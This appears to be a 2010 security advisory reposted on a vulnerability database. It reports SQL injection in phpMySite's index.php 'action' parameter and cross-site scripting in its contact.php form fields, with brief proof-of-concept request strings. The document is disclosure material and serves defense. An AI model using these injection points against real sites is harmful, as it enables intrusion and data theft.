phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities

2010.03.26
Credit: Crux
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

================================================================= [~] phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities ================================================================= ########################################################## ## Author: Crux ## Homepage: http://hack-tech.com ## Date: 2-27-2010 ## Software Link: http://www.phpmysite.com/ ## Version: N/A ########################################################## [ SQLi ] --------------------------------- // This vulnerability affects index.php // Can be exploited VIA the GET variable 'action' [#] Exploit / POC index.php?action=${SQLINJECTIONHERE}&key=111-222-1933email@address.tst [ XSS ] --------------------------------- // This vulnerability affects contact.php // Can be exploited via the following POST variables: // name, city, email, state, message [#] Exploit / POC name=Crux&city=1>">&state=NY&email=sample%40email%2Etst&message=111-222-1933email@address.tst&word=111-222-1933email@address.tst ================================================================= ________________________________ Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>

Referencje:

http://xforce.iss.net/xforce/xfdb/56574
http://www.vupen.com/english/advisories/2010/0492
http://www.exploit-db.com/exploits/11588
http://packetstormsecurity.org/1002-exploits/phpmysite-sqlxss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top